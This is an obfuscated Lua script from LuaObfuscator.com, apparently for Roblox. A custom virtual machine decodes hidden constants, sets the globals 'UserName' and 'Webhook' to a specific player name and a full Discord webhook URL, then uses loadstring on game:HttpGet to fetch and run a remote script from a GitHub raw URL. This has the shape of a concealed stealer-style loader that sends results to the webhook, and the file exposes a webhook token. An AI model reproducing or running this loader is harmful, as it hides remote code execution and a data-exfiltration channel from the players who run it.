--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v77=v5(v68,v19);v19=nil;return v77;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(2 -1))))%(((7 -4) -1)^(((v33-(2 -1)) -(v32-(1 -0))) + ((2023 -(892 + 65)) -(68 + 997)))) ;return v69-(v69%((1146 -526) -((1018 -463) + 64))) ;else local v70=931 -(857 + 74) ;local v71;while true do if (v70==(0 -0)) then v71=(570 -(367 + 201))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and (928 -(214 + 713))) or (0 + (350 -(87 + 263))) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==((1178 -(915 + 82)) -(67 + 113))) then return (v37 * (188 + (192 -124))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 + 0 ;v35=1 + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 2 + 1 );v18=v18 + 4 ;return (v41 * (22064430 -5287214)) + (v40 * 65536) + (v39 * (1443 -(1069 + 118))) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 -0)) then v45=(886 -(261 + 624)) + 0 ;v46=(v20(v44,1 -0 ,20) * (((3 -1) + 0)^(823 -(368 + 423)))) + v43 ;v42=2;end if (v42==((1089 -(1020 + 60)) -6)) then if (v47==((1441 -(630 + 793)) -(10 + 8))) then if (v46==0) then return v48 * (0 -0) ;else local v98=(1497 -1055) -((1969 -1553) + 26) ;while true do if (v98==(0 -0)) then v47=1 + 0 ;v45=0;break;end end end elseif (v47==(3621 -1574)) then return ((v46==((173 + 265) -((499 -354) + 293))) and (v48 * (((2178 -(760 + 987)) -(44 + (2299 -(1789 + 124))))/(1486 -(998 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/((2 + 0)^(824 -(201 + (1337 -(745 + 21))))))) ;end if (v42==(1138 -(116 + 1022))) then v43=v23();v44=v23();v42=4 -3 ;end if (v42==(1 + 1 + 0)) then v47=v20(v44,21,113 -82 );v48=((v20(v44,113 -81 )==(860 -(814 + 45))) and  -(2 -1)) or (1 + 0) ;v42=2 + 1 ;end end end local function v25(v49)local v50=(1817 -(1703 + 114)) -0 ;local v51;local v52;while true do if (v50==2) then v52={};for v78=3 -2 , #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=1 + 2 ;end if (v50==0) then v51=nil;if  not v49 then local v95=0;while true do if (v95==(0 + 0)) then v49=v23();if (v49==((1756 -(376 + 325)) -((141 -54) + 968))) then return "";end break;end end end v50=4 -3 ;end if (v50==(3 + 0)) then return v6(v52);end if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -((4350 -2936) -(447 + 966)) );v18=v18 + v49 ;v50=5 -3 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==1) then local v72=0;while true do if (v72==1) then v53=1173 -(418 + 753) ;break;end if (v72~=(0 + 0)) then else v56=nil;v57=nil;v72=1 + 0 ;end end end if (v53==2) then local v73=0;while true do if (v73==1) then v53=3;break;end if ((0 + 0)==v73) then v58=nil;v59=nil;v73=1;end end end if (v53==(1 + 2)) then v60=nil;while true do local v80=0;while true do if (v80==0) then local v99=529 -(406 + 123) ;while true do if (v99~=(1770 -(1749 + 20))) then else v80=1 + 0 ;break;end if ((1322 -(1249 + 73))==v99) then if (v54~=(1 + 1)) then else local v108=1145 -(466 + 679) ;while true do local v111=0;while true do if (0==v111) then if (v108==(2 -1)) then return v58;end if (v108==(0 -0)) then local v152=1900 -(106 + 1794) ;local v153;while true do if (v152==0) then v153=0;while true do if (v153==(0 + 0)) then local v182=0 + 0 ;while true do if (v182==(0 -0)) then for v184=1,v23() do local v185=0;local v186;local v187;local v188;local v189;while true do if ((5 -3)==v185) then while true do if (v186~=(115 -(4 + 110))) then else v189=nil;while true do if ((584 -(57 + 527))==v187) then local v197=1427 -(41 + 1386) ;while true do if ((104 -(17 + 86))~=v197) then else v187=1 + 0 ;break;end if (v197==(0 -0)) then local v198=0 -0 ;while true do if (v198~=0) then else v188=0;v189=nil;v198=1;end if (v198==(167 -(122 + 44))) then v197=1 -0 ;break;end end end end end if (v187~=(3 -2)) then else while true do if (v188==(0 + 0)) then v189=v21();if (v20(v189,1 + 0 ,1 -0 )~=0) then else local v199=0;local v200;local v201;local v202;local v203;local v204;while true do if (v199~=2) then else v204=nil;while true do if ((66 -(30 + 35))==v200) then v203=nil;v204=nil;v200=2 + 0 ;end if (v200~=2) then else while true do if ((1259 -(1043 + 214))~=v201) then else local v205=0 -0 ;while true do if (v205~=(1213 -(323 + 889))) then else v201=3;break;end if (v205==0) then if (v20(v203,1,2 -1 )~=(581 -(361 + 219))) then else v204[2]=v60[v204[2]];end if (v20(v203,322 -(53 + 267) ,2)==(1 + 0)) then v204[3]=v60[v204[3]];end v205=414 -(15 + 398) ;end end end if (v201==1) then v204={v22(),v22(),nil,nil};if (v202==0) then local v208=0;local v209;local v210;local v211;while true do if (v208==1) then v211=nil;while true do if (v209==(1 + 0)) then while true do if (v210==(850 -(20 + 830))) then v211=0;while true do if (v211==0) then v204[3]=v22();v204[4 + 0 ]=v22();break;end end break;end end break;end if (v209==(126 -(116 + 10))) then local v220=0;while true do if (v220==1) then v209=1;break;end if (v220~=(0 + 0)) then else v210=0;v211=nil;v220=739 -(542 + 196) ;end end end end break;end if (v208~=(0 -0)) then else v209=0;v210=nil;v208=1 + 0 ;end end elseif (v202==1) then v204[3]=v23();elseif (v202==(2 + 0)) then v204[2 + 1 ]=v23() -(2^(41 -25)) ;elseif (v202~=3) then else local v221=0;local v222;local v223;while true do if (v221==(0 -0)) then v222=0;v223=nil;v221=1;end if (v221==(1552 -(1126 + 425))) then while true do if (v222==(405 -(118 + 287))) then v223=0 -0 ;while true do if (v223==0) then v204[3]=v23() -((1123 -(118 + 1003))^16) ;v204[11 -7 ]=v22();break;end end break;end end break;end end end v201=2;end if (v201~=0) then else local v206=377 -(142 + 235) ;while true do if (v206==0) then v202=v20(v189,2,13 -10 );v203=v20(v189,1 + 3 ,983 -(553 + 424) );v206=1;end if (v206~=1) then else v201=1 -0 ;break;end end end if (3~=v201) then else if (v20(v203,3,3 + 0 )==(1 + 0)) then v204[4]=v60[v204[3 + 1 ]];end v55[v184]=v204;break;end end break;end if (v200~=(0 + 0)) then else v201=0;v202=nil;v200=1;end end break;end if (v199==1) then v202=nil;v203=nil;v199=2 + 0 ;end if (v199~=(0 -0)) then else v200=0;v201=nil;v199=2 -1 ;end end end break;end end break;end end break;end if (v186==(0 -0)) then v187=0 + 0 ;v188=nil;v186=4 -3 ;end end break;end if (v185~=1) then else v188=nil;v189=nil;v185=755 -(239 + 514) ;end if (v185==(0 + 0)) then v186=1329 -(797 + 532) ;v187=nil;v185=1 + 0 ;end end end for v190=1 + 0 ,v23() do v56[v190-1 ]=v28();end v182=1;end if (1==v182) then v153=2 -1 ;break;end end end if (v153==1) then v108=1203 -(373 + 829) ;break;end end break;end end end break;end end end end if (v54==0) then local v109=0;local v110;while true do if ((731 -(476 + 255))==v109) then v110=0;while true do if ((1131 -(369 + 761))==v110) then local v154=0;while true do if (v154==1) then v110=2;break;end if (v154==0) then v57={};v58={v55,v56,nil,v57};v154=1;end end end if (v110~=(3 -1)) then else v54=239 -(64 + 174) ;break;end if (v110~=0) then else local v155=0 + 0 ;local v156;while true do if (v155==0) then v156=0;while true do if (v156==1) then v110=1;break;end if (v156==(0 -0)) then v55={};v56={};v156=1;end end break;end end end end break;end end end v99=337 -(144 + 192) ;end end end if (v80==(217 -(42 + 174))) then if ((1 + 0)==v54) then local v106=0;local v107;while true do if (v106~=0) then else v107=0 + 0 ;while true do if (v107~=1) then else local v132=0;while true do if (v132==(0 + 0)) then for v159=1505 -(363 + 1141) ,v59 do local v160=1580 -(1183 + 397) ;local v161;local v162;local v163;local v164;while true do if (v160==1) then local v181=0 -0 ;while true do if (v181==1) then v160=2 + 0 ;break;end if (v181==0) then v163=nil;v164=nil;v181=1;end end end if (v160~=(0 + 0)) then else v161=0;v162=nil;v160=1976 -(1913 + 62) ;end if (v160==(2 + 0)) then while true do if (v161==(0 -0)) then local v183=1933 -(565 + 1368) ;while true do if (0~=v183) then else local v192=0 -0 ;while true do if (v192==0) then v162=0;v163=nil;v192=1662 -(1477 + 184) ;end if (v192==1) then v183=1 -0 ;break;end end end if (v183~=(1 + 0)) then else v161=857 -(564 + 292) ;break;end end end if (v161==(1 -0)) then v164=nil;while true do if (v162~=(0 -0)) then else local v193=304 -(244 + 60) ;local v194;while true do if ((0 + 0)~=v193) then else v194=0;while true do if (v194~=0) then else local v196=476 -(41 + 435) ;while true do if (v196~=0) then else v163=v21();v164=nil;v196=1;end if (v196==1) then v194=1002 -(938 + 63) ;break;end end end if (v194==1) then v162=1 + 0 ;break;end end break;end end end if (v162~=1) then else if (v163==(1126 -(936 + 189))) then v164=v21()~=(0 + 0) ;elseif (v163==(1615 -(1565 + 48))) then v164=v24();elseif (v163~=3) then else v164=v25();end v60[v159]=v164;break;end end break;end end break;end end end v58[3]=v21();v132=1 + 0 ;end if (v132==1) then v107=2;break;end end end if (v107~=(1138 -(782 + 356))) then else local v133=267 -(176 + 91) ;while true do if (v133==0) then v59=v23();v60={};v133=2 -1 ;end if (v133==(1 -0)) then v107=1;break;end end end if ((1094 -(975 + 117))~=v107) then else v54=1877 -(157 + 1718) ;break;end end break;end end end break;end end end break;end if ((0 + 0)~=v53) then else v54=0 -0 ;v55=nil;v53=3 -2 ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v81=v65;local v82=v66;local v83=v67;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v97=0;while true do if (v97==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then local v112;local v113,v114;local v115;local v116;v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v116=v93[2];v115=v91[v93[3]];v91[v116 + 1 ]=v115;v91[v116]=v115[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v116=v93[2];v113,v114=v84(v91[v116](v13(v91,v116 + 1 ,v93[3])));v86=(v114 + v116) -1 ;v112=0;for v134=v116,v86 do v112=v112 + 1 ;v91[v134]=v113[v112];end v85=v85 + 1 ;v93=v81[v85];v116=v93[2];v91[v116]=v91[v116](v13(v91,v116 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];elseif (v94>1) then local v140=0;local v141;local v142;while true do if (v140==1) then v91[v141 + 1 ]=v142;v91[v141]=v142[v93[4]];break;end if (v140==0) then v141=v93[2];v142=v91[v93[3]];v140=1;end end else v91[v93[2]]=v93[3];end elseif (v94<=3) then v63[v93[3]]=v91[v93[2]];elseif (v94>4) then v85=v93[3];else v91[v93[2]]();end elseif (v94<=8) then if (v94<=6) then local v128=v93[2];local v129,v130=v84(v91[v128](v13(v91,v128 + 1 ,v93[3])));v86=(v130 + v128) -1 ;local v131=0;for v137=v128,v86 do v131=v131 + 1 ;v91[v137]=v129[v131];end elseif (v94==7) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]=v63[v93[3]];end elseif (v94<=10) then if (v94>9) then v91[v93[2]]=v93[3]~=0 ;else do return;end end elseif (v94>11) then local v149=0;while true do if (v149==3) then v85=v93[3];break;end if (v149==2) then v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v149=3;end if (v149==0) then v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v149=1;end if (v149==1) then v85=v85 + 1 ;v93=v81[v85];v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v149=2;end end else local v150=v93[2];v91[v150]=v91[v150](v13(v91,v150 + 1 ,v86));end v85=v85 + 1 ;break;end if (v97==0) then v93=v81[v85];v94=v93[1];v97=1;end end end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O006E337266616C6578030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313534303331302O313531373138313935322F4F2O3346394835434730686B53582O724531564E3538636D3762524C48467A6E34316D586F513972526B724E70613250615668306E61764A3370464C466B78446D4E466700173O0012013O00013O0026073O000E000100020004053O000E0001001201000100043O00122O000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026073O0001000100010004053O00010001001201000100043O00120C000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00093O00017O00",v9(),...);
